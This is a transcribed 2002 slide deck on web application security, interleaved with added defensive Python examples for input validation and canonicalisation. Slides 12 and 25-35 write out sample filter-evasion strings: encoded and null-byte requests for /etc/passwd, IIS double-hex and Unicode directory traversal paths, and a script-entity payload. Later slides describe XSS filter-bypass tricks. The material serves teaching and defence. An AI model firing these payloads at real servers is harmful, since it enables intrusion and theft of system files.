  • Number of slides: 59

Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman

Taking Aim at Web Applications
Dennis Groves, Bill Pennington

Introduction (slide 2)
  • Bill Pennington, Principal Consultant, Guardent
  • Tested over 300 web applications over the past 3 years

Dennis Groves (slide 3)
  • Specialty: Enterprise Security, Web Application Security, Pen Testing & Quality Assurance.
  • Bio: Dennis is currently the Director of Internet Security Consulting for Centerstance, Inc. For the last 3 years his primary focus has been on Web Application Security. He is a founding member of the Open Web Application Project and a former Sanctum employee; he played a key role in the development of AppScan.

Why is this important? (slide 4)

Topics (slide 5)
  • This is not new
  • Why your firewall doesn’t matter
  • Types of attacks
  • Filter, Filter
  • Do you know where your data is?
  • Tools to help you

This is Not New (slide 6)
  • Problems with web applications are the same problems as with standalone applications

Why your Firewall doesn’t matter (slide 7)
  • Standard rant

Top 5 Vulnerabilities (slide 8)
  • SQL insertion
  • XSS
  • Session Hijacking
  • Parameter manipulation
  • Unbounded file calls

Cross site scripting, Why you should care (slide 9)
  • XSS is not an attack on the server, it is an attack on the users of your application
  • So what?
  • Identity theft
  • User masquerading
  • Reputation Risk

SQL Insertion (slide 10)
  • Most common on MS based applications.
  • All SQL apps are vulnerable (Oracle, Sybase, DB2…)
  • Can lead to full compromise of the server (xp_cmdshell)
  • Almost guaranteed to lead to data compromise
  • Demo…

Cross Site Scripting (XSS) (slide 11)
  • Found in 98% of applications I test
  • 2 main types:
  • Transient – URL based, e.g. http://badapp.com/error.jsp?msg=
  • Sticky – Script placed in a static bit of web content

XSS continued… (slide 12)
  • Transient generally requires user interaction
  • What can happen? Possibilities are only restricted by the client
  • Cookie theft most common example
  • But I filter “<” and “>”! JScript entities: “&{alert('Test')};”

Session Hijacking (slide 13)
  • HTTP is stateless so application designers must build a way to track state
  • Cookies and URL strings are the most common ways to track state
  • Both are easily exploitable

Session Hijacking continued… (slide 14)
  • Generally the next thing to occur after XSS
  • Please, people: logout means logout!
  • Examples of common session tracking issues

Parameter Tampering (slide 15)
  • Programmers will store data anywhere!
  • URL parameters – http://badapp.com/checkout.pl?p=$1.00
  • Cookies – Cookie: p=$1.00
  • Hidden fields – not really hidden

Unbound File Calls (slide 16)
  • Ye Ole’ ../
  • Watch out you don’t display important information (global.asa)
  • Most application languages will take URLs as file arguments

Do you know where your data is? (slide 17)
  • Building an exclusionary filter is difficult because your data is all over the place

Data Flow example (slide 18)

Designing a proper filter (slide 19)
  • Make all filters default deny
  • Don’t try to exclude “bad stuff”
  • Try to get a good idea where your data is going
  • Log all filter violations
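An added example (not from the deck) of the default-deny filter slide 19 calls for, applied to the checkout page from the Parameter Tampering slide: every parameter the page may receive is allowlisted with its exact shape, anything else is rejected, and every violation is logged. The parameter names `item` and `qty` and the logger name are assumptions; the slides only show `checkout.pl?p=$1.00`.

```python
import logging
import re
from typing import Dict, Optional, Tuple

log = logging.getLogger("webapp.filter")

# Allowlist for the checkout page: each parameter it is allowed to receive,
# with the exact shape the value must have. "item" and "qty" are assumed
# names for this example. Bounded lengths also cover the "long URL" case.
CHECKOUT_PARAMS = {
    "item": re.compile(r"[0-9]{1,8}"),        # catalogue id
    "qty": re.compile(r"[1-9][0-9]{0,2}"),    # 1..999
}
# Deliberately NOT listed: "p" (price). The price is looked up server-side
# from the item id; a client-supplied price is a filter violation.

Result = Tuple[Optional[Dict[str, str]], Optional[str]]


def reject(reason: str) -> Result:
    """Slide 19: log every filter violation, then deny."""
    log.warning("filter violation: %s", reason)
    return None, reason


def validate(params: Dict[str, str], spec=CHECKOUT_PARAMS) -> Result:
    """Default deny. Returns (cleaned_params, None) when every parameter is
    expected and well-formed, otherwise (None, reason) on the first violation.
    The same check applies whether the values came from the query string,
    a cookie or a hidden form field: the source does not make them trusted."""
    cleaned: Dict[str, str] = {}
    for name, value in params.items():
        pattern = spec.get(name)
        if pattern is None:
            return reject(f"unexpected parameter {name!r}={value!r}")
        if not pattern.fullmatch(value):
            return reject(f"{name!r}={value!r} does not match /{pattern.pattern}/")
        cleaned[name] = value
    missing = sorted(set(spec) - set(cleaned))
    if missing:
        return reject(f"missing required parameter(s) {missing}")
    return cleaned, None


if __name__ == "__main__":
    # Constructed requests: one legitimate, one with a client-supplied price.
    print(validate({"item": "1042", "qty": "2"}))
    print(validate({"item": "1042", "qty": "2", "p": "$1.00"}))
```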

Examples (slide 20)
  • ASP
  • PHP
  • JScript
  • Perl

Bypassing poorly designed filters
  “All warfare is based on deception… If he is in superior strength, evade him.” – Sun Tzu, The Art of War, 500 BC

Evasion (slide 22)
  Evasion is the art of blending in so you will not be noticed; of course this age-old technique of survival is still useful today.
  evade:
  1. to escape or avoid somebody or something, usually by ingenuity or guile
  2. to avoid doing something unpleasant, especially something that is a moral or legal obligation
  3. to avoid dealing with or responding directly to something
  4. to be difficult or impossible for somebody to find, obtain, or achieve (formal)

Filter Bypassing (slide 23)
  Filter Bypassing is a technique to evade detection by filtering systems. Filter Bypassing techniques come in many varieties when applied to the many facets of web application security. The general idea of the various techniques described is to bypass security measures designed to prevent certain types, amounts or values of data from being passed into a given system. Many of the described techniques can be highly effective when used properly and become even more powerful when used in combination.

Most filter systems are very simple (slide 24)
  Most filter systems are very simple, as the flow chart shows.
  Evade: 1. to escape or avoid somebody or something, usually by ingenuity or guile…
  Seven forms of ingenuity:
  • URL Encoded Strings
  • Double Hex Encoding
  • Unicode Encoded String
  • Long URLs
  • Case Sensitivity
  • XSS Filter-Bypass Manipulation
  • Null Character Injection

The Hex Advantage (slide 25)
  By URL hex encoding URL strings, it may be possible to circumvent filter security systems and IDS.
  http://foo.com/cgi?file=/etc/passwd
  Can become:
  http://foo.com/cgi?file=/%2F%65%74%63%2F%70%61%73%73%77%64

Double Hex Encoding (slide 26)
  In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability. The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL. An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit a vulnerability. When an un-patched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL. IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding. This secondary decoding was the source of another vulnerability.

IIS Double Hex (slide 27)
  Round 1 Decoding: scripts/..%255c../winnt becomes: scripts/..%5c../winnt (%25 = “%” character)
  Round 2 Decoding: scripts/..%5c../winnt becomes: scripts/..\../winnt
  Directory path traversal is now possible using path obfuscation through Double Hex Encoding.

The Unicode Slash (slide 28)
  In Unicode, “%c0%af” is the equivalent of a slash (“/”). Therefore the common URL IIS exploit: scripts/..%c0%af../winnt becomes: scripts/../../winnt
  Once again, directory path traversal is now possible using path obfuscation through Unicode.

Double Slash (slide 29)
  Using multiple directory slashes in URLs. For example: http://www.foo.com/..//etc//passwd. Can be used to move under the radar of IDS systems and still function properly.

Long URLs (slide 30)
  Many systems put limits on how much data a variable can store or a system can handle. Oftentimes, if these limits are exceeded, the data will still be used but bypass certain security considerations.
  URLs such as: http://www.foo.com/cgi?param=filename
  Replaced with: http://www.foo.com/cgi?param=<2K_of_Data>

Case Sensitivity (slide 31)
  Case sensitivity may play a role in many security filtration systems. Alternating case on URL parameters may be used to bypass certain restrictions.
  http://foo.com/cgi?param=bar
  http://foo.com/cgi?param=BaR
  http://foo.com/CGI?param=BAR

Method Switching (slide 32)
  Many web applications do not properly perform HTTP Request Method sanity checking. Performing Method Switching can be used to bypass IDS, logging features and CGI security mechanisms. Most web servers do not log "POST" data and thus forensic analysis is harder to perform.
  The Request Method: GET /cgi-bin/some.cgi
  can become: POST /cgi-bin/some.cgi

HTTP 1.1 Methods (slide 33)
  The Method token indicates the method to be performed on the resource identified by the Request-URI.
  • OPTIONS
  • GET
  • HEAD
  • POST
  • PUT
  • DELETE
  • TRACE
  • CONNECT

Using your “HEAD” (slide 34)
  The “HEAD” request method can be used to determine if a particular HTTP resource is accessible without actually downloading the resource data. Scans and web application attacks can be made more effective using this technique.

Null Character Injection (slide 35)
  Hex encoded null characters can be used to thwart some security mechanisms. This happens because in the “C” programming language, a null character designates the end of a string. So if a CGI appends “.html” to an input parameter:
  http://foo.com/cgi?file=../etc/passwd%00
  will cut off the appended “.html”.
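An added example (not code from the deck or from IIS) that models the decoding-order flaw of slides 26 and 27 and the decode-once-then-check canonicalisation that defeats it, along with the URL hex (slide 25), overlong Unicode slash (slide 28), double slash (slide 29) and null byte (slide 35) cases. The inputs in the tests are constructed from the deck's own sample paths.

```python
import re
from typing import Optional
from urllib.parse import unquote_to_bytes


def resolve(path: str) -> Optional[str]:
    """Resolve '.' and '..' over both slash styles; None if the path climbs
    above its starting directory (the check a web root needs)."""
    stack = []
    for seg in re.split(r"[\\/]", path):
        if seg == "..":
            if not stack:
                return None
            stack.pop()
        elif seg not in ("", "."):
            stack.append(seg)
    return "/".join(stack)


def decode_check_decode(path: str) -> Optional[str]:
    """Constructed model of the ordering flaw on the IIS slides: decode once,
    run the traversal check, then decode AGAIN before use. The second decode
    is what turns %5c back into a path separator after the check passed."""
    once = unquote_to_bytes(path).decode("latin-1")
    if resolve(once) is None:
        return None                  # "..%5c.." is one harmless-looking segment
    return unquote_to_bytes(once).decode("latin-1")   # bug: decoded again


def canonical_path(path: str) -> Optional[str]:
    """Decode exactly once, refuse anything that still looks encoded, and run
    the traversal check only on the final form."""
    raw = unquote_to_bytes(path)
    if b"\x00" in raw:               # slide 35: a null byte would truncate a C string
        return None
    if b"%" in raw:                  # slides 26/27: residual '%' means double encoding
        return None
    try:
        text = raw.decode("utf-8")   # strict decoder rejects overlong %c0%af (slide 28)
    except UnicodeDecodeError:
        return None
    if text.startswith(("/", "\\")):  # absolute paths never come from a client
        return None
    text = re.sub(r"[\\/]+", "/", text)   # slide 29: collapse //etc//passwd
    return resolve(text)


if __name__ == "__main__":
    for p in ("scripts/..%255c../winnt", "scripts/..%c0%af../winnt",
              "..%2Fetc%2Fpasswd%00", "docs//read%20me.txt"):
        print(p, "->", decode_check_decode(p), "|", canonical_path(p))
```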

Unicode (UTF-8) Encoded (slide 36)
  Unicode is a universal way to represent characters. However, Unicode can also be used to circumvent security mechanisms by representing information in another fashion. Microsoft IIS has had security issues in the past while supporting Unicode.

URL Encoded String (slide 37)
  The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it limits the allowed characters in URLs to a limited subset of the US-ASCII character set: “... Only alphanumerics [0-9a-zA-Z], the special characters "$-_.+!*'()," [not including the quotes – ed], and reserved characters used for their reserved purposes may be used unencoded within a URL.”

XSS Filter-Bypass Manipulation (slide 38)
  This technique is used to pass various types of client-side scripting language through implemented security filters. The idea is to achieve client-side execution of a client-side script. There are several techniques used to perform this attack.

Test the Filters (slide 39)
  Submit all the raw HTML tags you can find, and then view the output results. Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript event handlers). This will show what HTML is allowed, what the changes were, and possibly dangerous HTML that can be exploited.

SRCing the protocol (slide 40)
  Using the “javascript” protocol in an HTML source attribute.

Alternate Protocol SRCing (slide 41)
  Same technique as the previous; however, using the protocols “livescript” and “mocha” will yield the same effect.

Decimal HTML Entities (slide 42)
  Variation on previous techniques: using decimal HTML entities between the protocol characters can be used to bypass filters, yet still execute JavaScript. The decimal entities 9, 10, 11, 12 and 13 have all been seen to work.

Hex HTML Entities (slide 43)
  Another variation on the previous example: hex HTML entities may also be used to bypass filter restrictions, yet execute JavaScript.

Padding HTML Entities (slide 44)
  Padding HTML entities with “0”s may also be used to bypass the filters, yet still execute JavaScript.

STYLE JavaScript Type (slide 45)
  Changing the MIME type on a “style” tag may be used to execute JavaScript.

STYLE JavaScript X-Type (slide 46)
  Variation on the previous example, but by using the “application/x-javascript” MIME type, the filters may be bypassed.

STYLE JavaScript Import (slide 47)
  Using the @import feature in CSS may be used to perform JavaScript protocol SRCing.

STYLE URL Import (slide 48)
  The @import feature in CSS can also be used to import JavaScript from another HTTP resource.

LINK Style Sheet (slide 49)
  The “LINK” tag can be used to import JavaScript from a remote HTTP resource.

Style Left Expression (slide 50)
  A few CSS features used together to execute JavaScript.

Remote SRCing (slide 51)
  A few HTML tags, such as “LAYER”, “ILAYER”, “FRAME”, and “IFRAME”, can be used to src in JavaScript from remote resources.

AND CURLY (slide 52)
  <IMG SRC=
  Syntax must be exact.

Dangerous HTML Tags
  “All HTML is to be considered dangerous, but these tags are the most insidious.”
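An added example (not from the deck) applying slide 19's default-deny rule to the URL-bearing attributes covered by slides 40 to 49: the attribute value is first canonicalised the way a browser would read it (entities decoded, control characters removed, case folded), and only then is its scheme compared to an allowlist, so the decimal, hex, zero-padded and control-character entity variants all reduce to the same rejected form. The last two functions revisit the “&{...}” point from slide 12: stripping “<” and “>” leaves the JScript entity intact, while encoding “&” does not. The scheme allowlist and the test vectors are constructed for this example.

```python
import html
import re

# Assumed policy for this example: only these schemes may load a resource
# via SRC, HREF, LINK or a CSS @import. Everything else is denied.
SAFE_SCHEMES = {"http", "https"}


def canonical_attr_url(value: str) -> str:
    """Undo what a browser undoes before it reads the attribute: HTML entities
    (decimal, hex, zero-padded, with or without ';') and control characters
    such as 9..13 placed inside the scheme. Spaces are dropped as well, which
    is stricter than a browser; for a default-deny filter over-rejecting is
    the safe direction."""
    text = html.unescape(value)
    text = "".join(ch for ch in text if ord(ch) > 32)
    return text.lower()                 # slide 31: compare case-insensitively


def attr_url_allowed(value: str) -> bool:
    """True only if the canonical URL is relative or uses an allowlisted scheme."""
    text = canonical_attr_url(value)
    m = re.match(r"([a-z][a-z0-9+.-]*):", text)
    if m is None:
        return True                     # relative URL: no scheme to abuse
    return m.group(1) in SAFE_SCHEMES


def strip_angle_brackets(text: str) -> str:
    """The '<' and '>' filter from slide 12: it never touches '&{...}'."""
    return text.replace("<", "").replace(">", "")


def encode_for_html(text: str) -> str:
    """Encode every HTML metacharacter, '&' included, so no entity survives."""
    return html.escape(text, quote=True)
```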